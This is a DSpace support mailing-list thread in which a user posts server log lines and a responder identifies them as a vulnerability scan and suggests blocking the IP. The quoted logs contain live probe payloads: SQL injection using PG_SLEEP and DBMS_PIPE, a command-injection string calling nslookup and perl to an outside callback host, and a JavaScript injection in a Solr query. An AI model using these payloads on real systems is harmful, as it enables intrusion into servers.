Hi Nicolas, Those logs make it look like someone is attempting to hack into your system or find a vulnerability by generating random URLs.
Those "GET /communities/" paths you shared appear to have embedded SQL commands and embedded Javascript. So, they look to be trying to determine if there's a way to execute those commands against your system. DSpace itself will never access or use URLs of those types. My recommendation would be to see if you can block the IP address which is sending those commands. While none of those commands should do anything in DSpace 7, they are obviously up to no good & trying to find a way to hack your system. Overall, I don't see any bugs here in DSpace's behavior based on anything you've shared. Tim ________________________________ From: [email protected] <[email protected]> on behalf of Nicolas Battaglia <[email protected]> Sent: Wednesday, October 12, 2022 3:31 PM To: DSpace Technical Support <[email protected]> Subject: [dspace-tech] Support Hello everybody I've a problem with my dspace 7.2 PROD server Today the angular client stopped working, after restarting it it works for a few minutes and stops. In the nodejs console I found messages similar to these GET /communities/6a318891-0c45--1%20OR%202+555-555-1=0+0+0+1-b3b6-4caa1be4af44 404 995.928 ms - - GET /communities/de19a2f4-1be2-8MBJaJkQ'))%20OR%20510=(SELECT%20510%20FROM%20PG_SLEEP(15))--c80-a57a-3814a958fb8e 404 1129.742 ms - - GET /communities/2'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98),15)%7C%7C'a8a3d54-61f6-4663-a293-d7fe02058c76 200 800.296 ms - - Environment: Production GET /communities/6a318891-0c45-1*4277-b3b6-4caa1be4af44 404 779.049 ms - - Environment: Production Environment: Production GET /communities/f824abaf-%7C(nslookup%20hitlerkvauufubbfc3.bxss.me<http://20hitlerkvauufubbfc3.bxss.me>%7C%7Cperl%20-e%20%22gethostbyname('hitlerkvauufubbfc3.bxss.me<http://hitlerkvauufubbfc3.bxss.me>')%22)a85-459f-a087-e521fd3f486f 200 1215.078 ms - - and, in my dspace.log file, some messages like this: 022-10-12 03:51:55,017 ERROR unknown 70ae76ad-f77a-44f3-8932-58586342dc12 org.dspace.app.rest.utils.DiscoverQueryBuilder @ anonymous::Error in Discovery while setting up date facet range:date facet\colon; org.dspace.discovery.configuration.DiscoverySearchFilterFacet@20f3548b org.dspace.discovery.SearchServiceException: Error from server at http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[2020 TO "+(function(){if(typeof xwuYUD==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP> "undefined\"){var "" at line 1, column 62. Was expecting one of: "]" ... "}" ... at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:726) ~[dspace-api-7.1.1.jar:7.1.1] Caused by: org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: Error from server at http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[2020 TO "+(function(){if(typeof xwuYUD==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP> "undefined\"){var "" at line 1, column 62. Was expecting one of: "]" ... "}" ... by the way, my today dspace log file is 200mb (others days is about 4mb) any ideas? thans -- All messages to this mailing list should adhere to the Code of Conduct: https://www.lyrasis.org/about/Pages/Code-of-Conduct.aspx --- You received this message because you are subscribed to the Google Groups "DSpace Technical Support" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]<mailto:[email protected]>. To view this discussion on the web visit https://groups.google.com/d/msgid/dspace-tech/CAJVJSdBYT-DbZqWjh8Buq0z8T5GbNh2KO5q-d5jjEMqXqi4pjg%40mail.gmail.com<https://groups.google.com/d/msgid/dspace-tech/CAJVJSdBYT-DbZqWjh8Buq0z8T5GbNh2KO5q-d5jjEMqXqi4pjg%40mail.gmail.com?utm_medium=email&utm_source=footer>. -- All messages to this mailing list should adhere to the Code of Conduct: https://www.lyrasis.org/about/Pages/Code-of-Conduct.aspx --- You received this message because you are subscribed to the Google Groups "DSpace Technical Support" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. To view this discussion on the web visit https://groups.google.com/d/msgid/dspace-tech/PH0PR22MB3274B67F1F78756D4A0C1279ED259%40PH0PR22MB3274.namprd22.prod.outlook.com.
